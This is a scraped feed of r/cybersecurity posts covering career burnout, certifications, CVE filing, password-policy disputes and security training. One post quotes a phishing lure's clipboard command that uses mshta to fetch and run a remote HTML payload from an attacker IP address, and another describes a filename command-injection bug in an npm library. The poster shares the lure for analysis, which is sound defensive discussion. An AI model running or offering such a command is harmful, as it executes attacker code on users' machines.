cybersecurity

The original post: /r/cybersecurity by /u/chs0c on 2024-11-19 14:21:41.

I have nearly 3 years in this industry now, and I enjoy it, but wow. Do other professions have this much cock-stroking?

All I ever read is that you need a passion, a drive, you need to live breathe eat drink cyber security in order to succeed in it (or even work in it). I've always seen it recommended that you have a home lab, learn new tools, learn new techniques, study for certifications AND work in security, all at once. Don't get me started on other security people on places like LinkedIn, the amount of time these people dedicate to security is absurd.

Cyber security is an industry in which I work, to make money, to live life and make ends meet. The idea of doing MORE security outside of work hours is ludicrous to me.

And people wonder why there's a huge burnout rate?

The original post: /r/cybersecurity by /u/wound_dear on 2024-11-19 14:15:22.

My hotel email recently got an interesting phishing attempt. It contained a link spoofed to look like a genuine Booking.com link. When loading the site, a fake reCaptcha box loads with instructions to open the Run program on Windows, hit CTRL+V, and hit enter. The clipboard is loaded with this command:

mshta http://185.147.124.40/Capcha.html # ✅ ''I am not a robot - reCAPTCHA Verification ID: 3781''

I thought this was an interesting attack. The real interesting thing, though, is the script loaded in on the IP's "Capcha.html" file, which I've put in an (unlisted) pastebin here.

I can recognize this is obfuscated code, but I have no idea how to crack this any further. Also, I feel like having an unshielded IP address is kind of a liability, no?

The original post: /r/cybersecurity by /u/rustybladez23 on 2024-11-19 12:56:04.

Hi everyone. I want to build a career in cybersecurity (offensive side of things). I'm currently in my 3rd year in Uni. So I'm thinking of prepping from now so that I can get job ready after graduation.

So I'm kinda in a dilemma. I've been following The Cyber Mentor for some time and honestly he was my biggest inspiration for getting interested in cyber. I've watched their free content and liked it. Currently they are running a sale.

On the other and, there's TryHackMe which is a great platform and fun to learn from (I did their Advent of Cyber last year, liked it too).

I'm planning to get an annual subscription of either of these. Both are $100+ (THM is a bit cheaper I think). For a student in a 3rd world country, that's a big investment.

So which do you think would be money's worth? Or should I stick to free resources for now since there are tons out there (and good quality). What would be your suggestion?

Thanks in advance.

The original post: /r/cybersecurity by /u/arqf_ on 2024-11-19 12:51:44.

The original post: /r/cybersecurity by /u/Free_Trial_Of_Life on 2024-11-19 12:25:47.

Hello folks, I need advice from guys with experience of obtaining CVE. I am facing issues while getting a CVE for my finding. It gets rejected for unknown reasons. Let me describe the situation:

• Software is an NPM library X that offers utility methods for abstract usage of another software Y. Library X was developed by an independent person, not tied to vendor of Y. The library X has around 150k weekly downloads, so it's prevalently used.

• The library exports a function to process certain files and perform operations on it. Vulnerability is a command injection in filename that is passed to this function. The filename is inserted into a CLI command for running Y and can be escaped to inject malicious commands. I built a sample webapp and showcased PoC exploitation.

• I shared this finding with both vendor Y and developer of library X, and got successful responses from each. Developer of X even invited me for collaboration in fixing this vuln. But he ghosted me afterwards, didn't get back to my messages. So vulnerability remained unresolved.

After a while I applied for a CVE record both in mitre and vuldb but both rejected my request. VulDB's response:

* Unfortunately, we are not able to handle this issue. Please contact MITRE at https://cveform.mitre.org/

MITRE's response:

There is no CVE ID associated with the X NPM library for this. The existence of exported functions does not mean that the library is intended to be used in a situation where "a user-controlled filename

is passed to X function as it is."

MITRE's response does not make sense in my opinion. CVE ID does not exist because it's a new finding. My PoC also shows how applications using this library can be exploited to gain RCE. Library cannot guarantee that filename is not user-controlled.

I am confused. How should I navigate this situation? What am I missing that makes my finding invalid? I would appreciate any kind of help.

The original post: /r/cybersecurity by /u/manindrasmack on 2024-11-19 11:18:47.

Hi,

One of my friends got a call from Apple for a pen-testing role. The first round of interviews is HTB. I would like to know if anyone has an idea of what kind of machines we can expect for this role.

https://jobs.apple.com/en-in/details/200558639/penetration-tester-retail-engineering

The original post: /r/cybersecurity by /u/cydex0 on 2024-11-19 10:29:56.

Cybersecurity and Hiring managers, what do you all think about PNPT cert in general and how has your experience been with candidates holding PNPT

The original post: /r/cybersecurity by /u/apoklinon on 2024-11-19 09:52:26.

When I first worked in the industry I always admired people with a lot of reputable certifications. I also fell into the same trap and started to collect them like Pokémon cards.

On the one side it was the challenge and the thrill that is a healthy situation but it was also the peer and HR pressure that sucks big time. Long story short, after a few years in different domains and positions and after interacting with many professionals I realized that the more knowledgeable and skilled someone is the less they care about being certified about their skills. I have reached the point where now I'm almost biased against people with many certs because I feel like they are trying very hard to cover their experience and skill gap with certs. Super smart and talented professionals I have met couldnt care less for an OffSec cert while people trying to prove them selfs hunt them down like crazy.

Don't get me wrong, I'm not saying everyone that has a lot of certs is not compitent enough to do their job, I just belive that a 1h interview speaks more than a CV with all the latest facny certs. I have seen red teamers that can do APT level stuff and crazy research but they don't even bother take an OSCP where I have also seen people with CEH, All the Comptia's and CISA, CISSP having trouble using nmap. I know, I know these are different domains and different kind of work so the comparison isn't fair and the certs not relevant but I'm sure the red teamer could take all these certs without even trying in a week, they just don't care.

What are your thoughts on this? Im I being unfair here? On average, are people with tons of certs actually less skilled?

The original post: /r/cybersecurity by /u/peraphon on 2024-11-18 22:53:49.

Hey all,

We use Pentera to do hash cracking of our onprem AD each week, and I have written a Powershell script to take the list of users and follow them up every 6 weeks with best practices for creating a passPHRASE rather than a password.

Please note that we never see a user's password - we only ever see the gauged password "strength" (ie GPU effort).

A user has emailed back saying that he would like to decline my request for him to change his password, that he was advised when he changed his password last that it was a good strong password and didn't require changing, and to desist with constant badgering and harassment about changing his password.

On a previous occasion he threatened union involvement when I asked him to change his password, claiming a "constant invasion of privacy" (LOL!)

I've been following this user up since 1 March about crackable passwords - he changed it once but it was still crackable.

So, WWYD with a user who obviously has no regard for infosec or network security?

Thx everyone

The original post: /r/cybersecurity by /u/ooootheysosensitive on 2024-11-19 05:15:39.

I have a job interview tomorrow where I was told to review the following topics, which I feel I have. How would you guys test to make sure you understand the concepts? Are there practice code reviews I can do?

"We want you to be able to identify security flaws via code review and demonstrate deep understanding of the issues found. We want you to be able to explain your approach to code review during the interview, explain the risk of each issue, explain how the issue might get exploited and suggest fixes with practical security and defense-in-depth in mind.

OWASP TOP 10

In depth understanding of core web concepts like SOP (same origin policy) and HTTPS certificate validation

Understanding of web application fundamentals

Cryptography

• Encryption at rest and in transit
• Symmetric encryption and its applications
• Public Key Cryptography and its applications
• Credentials (password) storage and Hashing"

The original post: /r/cybersecurity by /u/Techatronix on 2024-11-19 04:55:58.

I created my account and snooped around a little bit. Looks pretty good. I had an account with FedVTE but I did not use it. How is this supposed to work for CPEs? How did FedVTE work?

Do they auto-report your CPEs? Or do you just download certificate of completion and upload to the certifying body? Also, did FedVTE have cert prep courses? Or was it just more general keeping current with technology?

The original post: /r/cybersecurity by /u/BrycenLong6 on 2024-11-19 02:44:55.

I found an exploit for iPhones and I wanted to test it out and see if I can break in. Just wanted to make sure that wouldn’t land me in jail.

The original post: /r/cybersecurity by /u/cppnewb on 2024-11-18 23:48:13.

I have 5 YOE as a Software Engineer and about 3 YOE as an Application Security Engineer. Still relatively new in the security space. I have experience in: threat modeling, architecture reviews, secure code reviews, analyzing results from SAST/DAST scans, pentesting, tool development, and providing vulnerability remediation guidance to development teams. In my current team, each AppSecEng is directly responsible for one specific domain. One engineer works with just SAST/DAST, one engineer only does pentests, etc. My domain is threat modeling, but I also have a number of random projects on the side. Writing various automation scripts, configuring an in-app WAF, enabling secrets scanning on various repos, etc. While my coworkers are specialists, I find myself to be a generalist. From a career growth perspective, I wonder if I need to laser focus on one area, or if I can continue doing what I'm doing. FWIW, I'm happy with my work, but want to make sure I'm gaining the necessary skills to get promoted to Senior and beyond.

The original post: /r/cybersecurity by /u/J0wad on 2024-11-18 23:06:30.

Hello, I'm a junior in High School and for an assignment for a class I'm supposed to interview someone from the field I want to study (which is Cybersecurity). DM me in you're interested and we'll get talking. Thanks!

The original post: /r/cybersecurity by /u/JCTopping on 2024-11-18 21:45:25.

The original post: /r/cybersecurity by /u/Jungleexplorer on 2024-11-18 21:37:59.

I understand the danger that exist, but the problem is, the harder they try to FORCE people to become more secure, the more insecure they make us.

It used to be that you could log with your username and password. Then, they started requiring you to verify via email in some cases. Today, none of that works in most cases. It does not matter if you know your username, password, and email. None of that will get you back into your account. So why even have them anymore???? If a username, password, and email verification are no longer considered "Secure" why even have them AT ALL?! It makes no freaking sense.

The problem I have with all of this, is that every time they demand you divulge more and more personal information about yourself, in order to "Make Sure it is YOU", that information gets stored in a database somewhere, which will eventually get hacked, and then all that personal identity information will end up on the dark web for crooks to use. You know I am telling the truth. It has happened countless times already. This is the exact reason why usernames, passwords, mother's maiden name, first pet, emails etc, etc, etc, are no longer considered secure.

I just had a website (that I have had an account with for over ten years) refuse to let me access my account unless I provide Biometric verification to them. Are you F*ck**n kidding me!!! Yeah sure, here! Let me give you my fingerprints, iris scan, and DNA so you can get that on file for someone to steal. I told them to go screw themselves.

It has just gotten ridiculous. If in our efforts to keep people secure, we lock them out of their accounts, what is the point?

The original post: /r/cybersecurity by /u/Novel_Negotiation224 on 2024-11-18 21:22:38.

The original post: /r/cybersecurity by /u/antdude on 2024-11-18 21:20:07.

The original post: /r/cybersecurity by /u/anynamewillbegood on 2024-11-18 21:17:25.

The original post: /r/cybersecurity by /u/arqf_ on 2024-11-18 21:16:05.

The original post: /r/cybersecurity by /u/sasko12 on 2024-11-18 20:52:01.

The original post: /r/cybersecurity by /u/arqf_ on 2024-11-18 20:34:57.

The original post: /r/cybersecurity by /u/JCTopping on 2024-11-18 20:33:56.

The original post: /r/cybersecurity by /u/Comfortable-Bus-88 on 2024-11-18 20:10:57.

currently in our company (small it company <50 employees)we do de training during a meeting where everyone has to participate (max 30 min). Now I will try to make multiple training where each module consists of slides, video and questions at the end. We already cover some topics like passwords, phishing, clean desk, physical security (like letting external people in the office etc) and some additional security topics for the developers eg docker, ssh and so on. I would appreciate some hints on what topics we should definitely cover and maybe some examples would be nice. all advices are welcome

The original post: /r/cybersecurity by /u/Fit_Presence_7055 on 2024-11-18 19:50:51.

Hey All,

Since mail rules are one vector of bad actor persistence, do you guys use Powershell to find suspicious rules? If so, do you mind sharing what you are doing and looking for?